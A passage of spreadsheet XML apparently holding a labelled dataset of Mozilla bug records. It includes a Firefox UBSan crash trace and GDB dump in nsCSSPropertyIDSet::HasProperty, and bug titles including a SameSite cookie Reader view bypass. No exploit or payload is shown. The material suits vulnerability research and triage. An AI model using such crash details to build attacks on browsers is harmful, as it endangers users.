    #43 0x7f33787b6e5b in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:1103:7
    #44 0x7f337af2dc50 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:6512:20
    #45 0x7f337af2cfc8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:5868:7
    #46 0x7f337af2ed7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp
    #47 0x7f3372d88a86 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/checkouts/gecko/uriloader/base/nsDocLoader.cpp:1332:3
    #48 0x7f3372d877f5 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/checkouts/gecko/uriloader/base/nsDocLoader.cpp:938:14
    #49 0x7f3372d8478c in nsDocLoader::DocLoaderIsEmpty(bool, mozilla::Maybe&lt;nsresult&gt; const&amp;) /builds/worker/checkouts/gecko/uriloader/base/nsDocLoader.cpp:757:9
    #50 0x7f3372d865c0 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/checkouts/gecko/uriloader/base/nsDocLoader.cpp:640:5
    #51 0x7f3372d8739c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/checkouts/gecko/uriloader/base/nsDocLoader.cpp
    #52 0x7f337146287b in mozilla::net::nsLoadGroup::NotifyRemovalObservers(nsIRequest*, nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsLoadGroup.cpp:616:22
    #53 0x7f3371464fe3 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsLoadGroup.cpp:523:10
    #54 0x7f3373a903a5 in imgRequestProxy::RemoveFromLoadGroup() /builds/worker/checkouts/gecko/image/imgRequestProxy.cpp:371:15
    #55 0x7f3373a96691 in imgRequestProxy::OnLoadComplete(bool) /builds/worker/checkouts/gecko/image/imgRequestProxy.cpp:1004:7
    #56 0x7f3373a68fe7 in operator() /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:351:13
    #57 0x7f3373a68fe7 in void mozilla::image::ImageObserverNotifier&lt;mozilla::image::ObserverTable const*&gt;::operator()&lt;void mozilla::image::SyncNotifyInternal&lt;mozilla::image::ObserverTable const*&gt;(mozilla::image::ObserverTable const* const&amp;, bool, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;)::'lambda5'(mozilla::image::IProgressObserver*)&gt;(mozilla::image::ObserverTable const*) /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:281:9
    #58 0x7f3373a6746f in void mozilla::image::SyncNotifyInternal&lt;mozilla::image::ObserverTable const*&gt;(mozilla::image::ObserverTable const* const&amp;, bool, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:350:5
    #59 0x7f3373a190e7 in operator() /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:369:5
    #60 0x7f3373a190e7 in Read&lt;(lambda at /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:368:19)&gt; /builds/worker/checkouts/gecko/image/CopyOnWrite.h:155:12
    #61 0x7f3373a190e7 in mozilla::image::ProgressTracker::SyncNotifyProgress(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/checkouts/gecko/image/ProgressTracker.cpp:368:14
    #62 0x7f3373a4a3d7 in mozilla::image::VectorImage::OnSVGDocumentLoaded() /builds/worker/checkouts/gecko/image/VectorImage.cpp:1445:23
    #63 0x7f3373a54542 in mozilla::image::SVGLoadEventListener::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/image/VectorImage.cpp:210:13
    #64 0x7f33761a4a06 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1107:22
    #65 0x7f33761a60e0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1298:17
    #66 0x7f337619376e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:353:17
    #67 0x7f3376191fe0 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:555:16
    #68 0x7f33761962b5 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1098:11
    #69 0x7f337619b8d9 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp
    #70 0x7f337413171a in nsINode::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/base/nsINode.cpp:1331:17
    #71 0x7f33761b27b3 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;) /builds/worker/checkouts/gecko/dom/events/EventTarget.cpp:177:13
    #72 0x7f3376128d1c in mozilla::AsyncEventDispatcher::Run() /builds/worker/checkouts/gecko/dom/events/AsyncEventDispatcher.cpp:69:12
    #73 0x7f337118fdf6 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:472:16
    #74 0x7f337118c9b2 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:753:26
    #75 0x7f337118a897 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:611:15
    #76 0x7f337118aced in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:395:36
    #77 0x7f3371197431 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:133:37
    #78 0x7f3371197431 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_3&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
    #79 0x7f33711b28f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1158:16
    #80 0x7f33711bc72c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
    #81 0x7f337229309a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
    #82 0x7f33721be191 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
    #83 0x7f33721be191 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
    #84 0x7f33721be191 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
    #85 0x7f33781d91b7 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #86 0x7f337b99760f in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:902:20
    #87 0x7f33721be191 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
    #88 0x7f33721be191 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
    #89 0x7f33721be191 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
    #90 0x7f337b996d9c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:733:34
    #91 0x55a7f500607d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #92 0x55a7f50064a1 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:306:18
    #93 0x7f338cf52b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
    #94 0x55a7f4f59a3c in _start (/home/sourc7/Programs/firefox-asan/firefox+0x54a3c)
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /builds/worker/workspace/obj-build/dist/include/nsCSSPropertyIDSet.h:65:13 in 
```
## GDB output:
```
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xffffffffffffffff
$rbx   : 0x1               
$rcx   : 0x3ffffffffffffff
$rdx   : 0x0
$rsp   : 0x00007fffffffadd0  →  0x00007fffab78a970  →  0x0000000000000001
$rbp   : 0x00007fffffffaea0  →  0x00007fffffffaef0  →  0x00007fffffffaf90  →  0x00007fffffffafe0  →  0x00007fffffffb080  →  0x00007fffffffb0c0  →  0x00007fffffffb640  →  0x00007fffffffb760
$rsi   : 0x2
$rdi   : 0x00007fffa94b1800  →  0x00007ffff4c2d698  →  0x00007fffef5a6a70  →  &lt;mozilla::dom::Animation::QueryInterface(nsID+0&gt; push rbp
$rip   : 0x00007ffff12004e2  →  &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; mov rcx, QWORD PTR [rbp+rcx*8-0x90]
$r8    : 0x00007fffab3c59d8  →  0x0000000100007f00
$r9    : 0x2               
$r10   : 0x00007fffaa0f6e28  →  0x00007fffadb8f1f8  →  0x00007fffe8da3760  →  0x0000000000000054 ("T"?)
$r11   : 0x0               
$r12   : 0x00007fffa94b1800  →  0x00007ffff4c2d698  →  0x00007fffef5a6a70  →  &lt;mozilla::dom::Animation::QueryInterface(nsID+0&gt; push rbp
$r13   : 0x00007fffab391668  →  0x00007fffb01ce8c0  →  0x0000000300000002
$r14   : 0x00007fffab9ecb68  →  0x0000000100007f00
$r15   : 0x1ad             
$eflags: [zero CARRY PARITY ADJUST sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffadd0│+0x0000: 0x00007fffab78a970  →  0x0000000000000001    ← $rsp
0x00007fffffffadd8│+0x0008: 0x0000000000000001
0x00007fffffffade0│+0x0010: 0x00007fffa8c02700  →  0x00007ffff4dccda8  →  0x00007fffef7e43a0  →  &lt;nsStyledElement::QueryInterface(nsID+0&gt; push rbp
0x00007fffffffade8│+0x0018: 0x00007fffae59a6a0  →  0x00007ffff4ea0918  →  0x00007ffff12baaf0  →  &lt;mozilla::CommonAnimationManager&lt;mozilla::dom::CSSTransition&gt;::~CommonAnimationManager()+0&gt; push rbp
0x00007fffffffadf0│+0x0020: 0x00007fffffffaeb8  →  0x00007fffab391640  →  0x00007fffae59a6a8  →  0x00007fffab391640  →  [loop detected]
0x00007fffffffadf8│+0x0028: 0x00000002ffffad70
0x00007fffffffae00│+0x0030: 0x00007fffffffad70  →  0xf8943c58872bf900
0x00007fffffffae08│+0x0038: 0x0000000000000000
─────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff12004d8 &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; dec    BYTE PTR [rax-0x68]
   0x7ffff12004db &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; mov    rcx, rax
   0x7ffff12004de &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; shr    rcx, 0x6
 → 0x7ffff12004e2 &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; mov    rcx, QWORD PTR [rbp+rcx*8-0x90]
   0x7ffff12004ea &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; bt     rcx, rax
   0x7ffff12004ee &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; jae    0x7ffff1200580 &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay const&amp;,  mozilla::dom::Element*,  mozilla::PseudoStyleType,  mozilla::AnimationCollection&lt;mozilla::dom::CSSTransition&gt;*&amp;,  mozilla::ComputedStyle const&amp;,  mozilla::ComputedStyle const&amp;)+1424&gt;
   0x7ffff12004f4 &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; mov    rdi, r12
   0x7ffff12004f7 &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; call   0x7fffef5b2f40 &lt;mozilla::dom::CSSTransition::TransitionProperty() const&gt;
   0x7ffff12004fc &lt;nsTransitionManager::DoUpdateTransitions(nsStyleDisplay+0&gt; mov    r14d, eax
────────────────────────────────────────────────────────────────────────────────────── source:/home/sourc7/gi[...].h+65 ────
     60    }
     61  
     62    bool HasProperty(nsCSSPropertyID aProperty) const {
     63      AssertInSetRange(aProperty);
     64      size_t p = aProperty;
 →   65      return (mProperties[p / kBitsInChunk] &amp;
     66              (property_set_type(1) &lt;&lt; (p % kBitsInChunk))) != 0;
     67    }
     68  
     69    // Returns an nsCSSPropertyIDSet including all properties that can be run
     70    // on the compositor.
─────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "firefox", stopped 0x7ffff12004e2 in nsCSSPropertyIDSet::HasProperty (), reason: SIGBUS
[#1] Id 3, Name: "gmain", stopped 0x7ffff7b8747f in poll (), reason: SIGBUS
[#2] Id 4, Name: "IPC I/O Parent", stopped 0x7ffff7b8cb9d in syscall (), reason: SIGBUS
[#3] Id 5, Name: "Timer", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#4] Id 6, Name: "Netlink Monitor", stopped 0x7ffff7b8747f in poll (), reason: SIGBUS
[#5] Id 7, Name: "Socket Thread", stopped 0x7ffff7b8747f in poll (), reason: SIGBUS
[#6] Id 8, Name: "Permission", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#7] Id 10, Name: "BHMgr Monitor", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#8] Id 11, Name: "BHMgr Processor", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#9] Id 13, Name: "JS Watchdog", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#10] Id 14, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#11] Id 15, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#12] Id 16, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#13] Id 17, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#14] Id 18, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#15] Id 19, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#16] Id 20, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#17] Id 21, Name: "JS Helper", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#18] Id 23, Name: "firefox:cs0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#19] Id 24, Name: "firefox:disk$0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#20] Id 25, Name: "firefox:disk$1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#21] Id 26, Name: "firefox:disk$2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#22] Id 27, Name: "firefox:disk$3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#23] Id 28, Name: "firefox:sh0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#24] Id 29, Name: "firefox:sh1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#25] Id 30, Name: "firefox:sh2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#26] Id 31, Name: "firefox:sh3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#27] Id 32, Name: "firefox:sh4", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#28] Id 33, Name: "firefox:sh5", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#29] Id 34, Name: "firefox:sh6", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#30] Id 35, Name: "firefox:sh7", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#31] Id 36, Name: "firefox:sh8", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#32] Id 37, Name: "firefox:shlo0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#33] Id 38, Name: "firefox:shlo1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#34] Id 39, Name: "firefox:shlo2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#35] Id 40, Name: "firefox:shlo3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#36] Id 41, Name: "GLXVsyncThread", stopped 0x7ffff7b8747f in poll (), reason: SIGBUS
[#37] Id 42, Name: "firefox:disk$0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#38] Id 43, Name: "firefox:disk$1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#39] Id 44, Name: "firefox:disk$2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#40] Id 45, Name: "firefox:disk$3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#41] Id 46, Name: "firefox:sh0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#42] Id 47, Name: "firefox:sh1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#43] Id 48, Name: "firefox:sh2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#44] Id 49, Name: "firefox:sh3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#45] Id 50, Name: "firefox:sh4", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#46] Id 51, Name: "firefox:sh5", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#47] Id 52, Name: "firefox:sh6", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#48] Id 53, Name: "firefox:sh7", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#49] Id 54, Name: "firefox:sh8", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#50] Id 55, Name: "firefox:shlo0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#51] Id 56, Name: "firefox:shlo1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#52] Id 57, Name: "firefox:shlo2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#53] Id 58, Name: "firefox:shlo3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#54] Id 59, Name: "firefox:gdrv0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#55] Id 60, Name: "Renderer", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#56] Id 61, Name: "WRWorker#0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#57] Id 62, Name: "WRWorker#1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#58] Id 63, Name: "WRWorker#2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#59] Id 64, Name: "WRWorker#3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#60] Id 65, Name: "WRWorker#4", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#61] Id 66, Name: "WRWorker#5", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#62] Id 67, Name: "WRWorker#6", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#63] Id 68, Name: "WRWorker#7", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#64] Id 69, Name: "WRWorkerLP#0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#65] Id 70, Name: "WRWorkerLP#1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#66] Id 71, Name: "WRWorkerLP#2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#67] Id 72, Name: "WRWorkerLP#3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#68] Id 73, Name: "WRWorkerLP#4", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#69] Id 74, Name: "WRWorkerLP#5", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#70] Id 75, Name: "WRWorkerLP#6", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#71] Id 76, Name: "WRWorkerLP#7", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#72] Id 77, Name: "Compositor", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#73] Id 78, Name: "ImageIO", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#74] Id 81, Name: "IPDL Background", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#75] Id 82, Name: "firefox", stopped 0x7ffff7fb65ad in recvmsg (), reason: SIGBUS
[#76] Id 83, Name: "IPC Launch", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#77] Id 84, Name: "TRR Background", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#78] Id 85, Name: "Cache2 I/O", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#79] Id 86, Name: "Cookie", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#80] Id 90, Name: "Worker Launcher", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#81] Id 91, Name: "threaded-ml", stopped 0x7ffff7b8747f in poll (), reason: SIGBUS
[#82] Id 92, Name: "ImageBridgeChld", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#83] Id 93, Name: "firefox:gdrv0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#84] Id 94, Name: "WRScene~ilder#1", stopped 0x7ffff7b8cb9d in syscall (), reason: SIGBUS
[#85] Id 95, Name: "WRScene~derLP#1", stopped 0x7ffff7b8cb9d in syscall (), reason: SIGBUS
[#86] Id 96, Name: "WRRende~ckend#1", stopped 0x7ffff7b8cb9d in syscall (), reason: SIGBUS
[#87] Id 97, Name: "FS Broker 16513", stopped 0x7ffff7fb65ad in recvmsg (), reason: SIGBUS
[#88] Id 98, Name: "QuotaManager IO", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#89] Id 100, Name: "DOM Worker", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#90] Id 101, Name: "StyleThread#0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#91] Id 102, Name: "StyleThread#1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#92] Id 103, Name: "StyleThread#2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#93] Id 104, Name: "StyleThread#3", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#94] Id 105, Name: "StyleThread#4", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#95] Id 106, Name: "StyleThread#5", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#96] Id 108, Name: "TaskCon~read #0", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#97] Id 109, Name: "TaskCon~read #1", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: SIGBUS
[#98] Id 110, Name: "TaskCon~read #2", stopped 0x7ffff7fb89ba in __futex_abstimed_wait_common64 (), reason: </t>
        </is>
      </c>
      <c r="X4346" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4347">
      <c r="A4347" t="n">
        <v>630695</v>
      </c>
      <c r="B4347" t="inlineStr">
        <is>
          <t>2011-02-01 15:09:48 -0800</t>
        </is>
      </c>
      <c r="C4347" t="inlineStr">
        <is>
          <t>Increase code coverage to 100%.</t>
        </is>
      </c>
      <c r="D4347" t="inlineStr">
        <is>
          <t>2011-06-23 09:29:15 -0700</t>
        </is>
      </c>
      <c r="E4347" t="n">
        <v>1</v>
      </c>
      <c r="F4347" t="n">
        <v>1</v>
      </c>
      <c r="G4347" t="n">
        <v>6</v>
      </c>
      <c r="H4347" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4347" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J4347" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4347" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4347" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4347" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q4347" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4347" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4347" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="T4347" t="n">
        <v>1</v>
      </c>
      <c r="U4347" t="n">
        <v>0</v>
      </c>
      <c r="V4347" t="n">
        <v>4</v>
      </c>
      <c r="W4347" t="inlineStr">
        <is>
          <t>Tests should cover all parts of the code.</t>
        </is>
      </c>
      <c r="X4347" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4348">
      <c r="A4348" t="n">
        <v>1456652</v>
      </c>
      <c r="B4348" t="inlineStr">
        <is>
          <t>2018-04-24 15:25:04 -0700</t>
        </is>
      </c>
      <c r="C4348" t="inlineStr">
        <is>
          <t>SameSite cookie Reader view patch bypass</t>
        </is>
      </c>
      <c r="D4348" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:29 -0700</t>
        </is>
      </c>
      <c r="E4348" t="n">
        <v>1</v>
      </c>
      <c r="F4348" t="n">
        <v>1</v>
      </c>
      <c r="G4348" t="n">
        <v>3</v>
      </c>
